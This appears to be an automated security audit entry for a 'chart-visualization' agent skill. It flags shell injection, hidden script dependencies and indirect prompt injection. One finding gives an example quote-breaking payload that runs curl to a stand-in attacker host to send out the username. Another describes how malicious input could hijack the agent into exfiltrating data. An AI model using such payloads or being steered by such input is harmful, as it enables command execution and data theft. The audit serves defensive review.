The Agent Skills Directory

[COMMAND_EXECUTION] (HIGH): Potential Shell Injection vulnerability in the execution workflow. The instructions in SKILL.md direct the agent to execute python ./scripts/generate.py '<payload_json>'. Since the <payload_json> is constructed from user-extracted parameters (like title or data), an attacker can provide input containing a single quote to break out of the command string and execute arbitrary bash commands (e.g., ' ; curl attacker.com/$(whoami) ; ').
[REMOTE_CODE_EXECUTION] (MEDIUM): The skill depends on a local script ./scripts/generate.py and multiple reference files in references/ that are not included in the skill package. This represents an 'unverifiable dependency' risk, as the actual logic for processing the JSON payload and generating the chart remains hidden and could contain malicious operations.
[PROMPT_INJECTION] (HIGH): Significant Indirect Prompt Injection surface. The skill is designed to ingest untrusted data from the user to 'Intelligently select' chart types and extract parameters. Because this data is used to build a shell command without explicit sanitization or boundary marker instructions, malicious input can hijack the agent's logic to execute unintended actions or exfiltrate data via the generated payload.

chart-visualization